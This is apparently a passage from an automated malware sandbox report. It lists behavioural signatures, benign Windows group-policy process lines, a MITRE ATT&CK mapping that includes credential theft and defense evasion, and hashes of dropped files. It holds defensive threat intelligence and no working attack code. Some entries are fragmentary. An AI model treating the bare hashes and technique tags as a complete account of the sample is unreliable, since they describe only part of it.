- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
2Disable or Modify Tools
2Indirect Command Execution
1Modify Registry
2Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD53765b9fe0b217d1955a6da8845f08459
SHA18e83a4306fda7c2d0febd10b3c2856197723cc72
SHA256a8526aea33951fdfd2bb865f09512a2a72c459589f183a96ac53cc3e4a75e021
SHA512325ab2d298eb9d492358374fdd165a5933a7c3738cd6f3bb9611f4dee07c9606a25588e816469361b4c4a534a827d741af4a4b3eb6e93b20ab217d9221f57287
-
Filesize
2KB
MD577cf803d7e639b16546adc87a7846189
SHA1e5ee904098278498e7ee7abe9eaa6fea81652d16
SHA25659bd27e6e64e816068c2a5df6cc1fe5d3c63db6c3997e13146ad5707e1085378
SHA512c8b2c5e07dc88105984c8e9978813bf0f590f04f69db76ee16a8375d1baf4204bff4561f8df6d848937b0afd96a140506b9140dbed4a988c19499f06a56ad32b
-
Filesize
2KB
MD5f8214d14b4cf89e498e35f1749f1cfc5
SHA10cd9d6a8ea49f8bcd54420aaf836426bf0343622
SHA2562758f6a43b71f8a7f39df6e41f5a7927c677c4f76b56f17db5466267bfef2151
SHA512f47b730efbb06345d4a215bf83aa628ca5c01bb27296a54c74c3c807465d6dda2b12b3e85b6313de964604561ccbd83890eabeaf7425e1ff2f9ce2be419ba80f
-
Filesize
2KB
MD5c4b7f436e998602a578556fb24278f4a
SHA1a3cefe1d152aad0e71ee226962115b87dd239ebf
SHA256f404a6bd6758f9d63b320af72dde2c78c0b35619b8b07dc072dd1e8c44de3c4f
SHA5127f93ff9ca1cb5d4d26f9fe72862301e5dc048bf4ade0e496e152ebae588962887cb20a88e338583aa9f8d53c60ba4b368e8bdf674cc37d881aeb166a135dd3c9
-
Filesize
2.1MB
MD56b0d4d6dc3804cf523adb88cdb5836a2
SHA173bbdffb3ce2c80b3acbc09c998d13b4393274e8
SHA2564bbe274056c4c53415bd66dfa45bd2d4b0ee7929664b682bdf790c7f8c75adb0
SHA51269796257894d6a9c8d80772ef974edc6c13cda2eb7a0db2fce5d7d0e4c255125d56036fb461fc2520836ca3e94f98fe6f1fa48a1f3fe35895e53c8b96b87a33d
-
Filesize
2KB
MD5dd5605c84b63082ead8cce31a382d284
SHA10cc5c1930607e9ad2162e76b6ede9d944f75b1ee
SHA25623307bb9e825a1c2f6476f73572e886f455ef9bbbd891baf86d420d2ebb36d96
SHA5121c0fb05594268a12b03852792eec278de7b527742654b36bf0450485e4b34839e1cb8a520256cf7023e8b87a6a940258a76fdb282ef7cd954b98273b232ea8b0
-
Filesize
187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
Filesize
136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
Filesize
150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
Filesize
10KB
MD5a9212a6cfd8f5be98936906c27da7177
SHA14c288a07537d1dee1ce4789b62b693b1e5c0cdc9
SHA25670b9b915b945adbd2e1d05846ecade49157c8fd544d296672d21dd44285f3c18
SHA512ae1d328bc6488fa47b05af42df629378cd6ad8534632d4177eb8504680450c2ed226f024996d6725263a5d6259ed1f578443c10b27f59528c9e6a8f83c0a99b0
-
Filesize
7KB
MD5df3d5c8d474399d616bb81b92e40e0c7
SHA15d67c1c515147714bd509385c0734fbe0fe4698f
SHA2560e244539ec938d1e5009ef00538237e4c47945c6e523af4095e187d0bb893987
SHA512b460a882b7983fcd950db884f4cc3af52a30f35e77e1874f04046f29512f9f720bd46c79a31af8067a6a2b52eb19b938af9557607a3119ec108cb90af9980395
-
Filesize
7KB
MD54ccd9864ab37e36ec37b36d544046db5
SHA127c17ed87b996dcb8993d91196ff016769d6cc3c
SHA25652272fef810d97dbcbf851bd63da3f2eef192c925c450da9eaa745c0ac87620f
SHA512b86a41ff6b300c7b9054d00bb49d681a6c42b758de69a6c9efa84725ec20d49ad4196c2c05c5e9aeb120e55b449d8a294aa0bd046cdd0be1596c9f4d067caadf
-
Filesize
7KB
MD50a679f6e54c4caad3890a3033400512f
SHA1da641ae3e317f0c54166643966ec089815002527
SHA2567eded787d99e620bdf790762fe500f7b7b06d5c37bbcfcf4a9fa17e228b60b6f
SHA51257319147956b6b4fb7ae6b66ff948a226d0c3c2a08264761939cb60f0d15fc4b246f43f421914c2cf02cf12500fa52d25bfeb824cb4052db762f063c6677c5b5
-
Filesize
7KB
MD57110caf704c40b362e673ac5159b29dd
SHA171f105811a768270ded8a0b0e698dded3fb474e9
SHA2569b18789cda840bdff5e02a7f760f10765c827b11d0c696dfea4bab6fdb4c0791
SHA5128f14fdc104bf26293a2b1e9ab956d110d8580eeea845047837cadaee502b96e38f1e4ecf592a57bec106f503eb8e3bbbb51f190de1d2192d362634e7867774f0
-
Filesize
9KB
MD572b1bc18984514e2a41d197d01ebf221
SHA1689188a900db2562f396419d8f25c9d989ae8817
SHA256ca469a0e7ce5bd964917a05e144517a0a363ba3a9e48d8a0fbac59f59ed2d9e9
SHA512864cbc65b7232866a2879cc36569274e415ef7eab3da8929915387364a901d62b78577c699eb8839ffc22618892653ae4a0f6f59cad59faa3974e721531f0b2c
-
Filesize
2.9MB
-
Filesize
32KB
-
Filesize
2.9MB
-
Filesize
32KB
-
Filesize
2.9MB
-
Filesize
5.9MB
-
Filesize
6.6MB
-
Filesize
532KB
-
Filesize
6.6MB
-
Filesize
5.9MB
-
Filesize
388KB
-
Filesize
512KB
-
Filesize
828KB
-
Filesize
5.9MB
-
Filesize
6.6MB
-
Filesize
5.9MB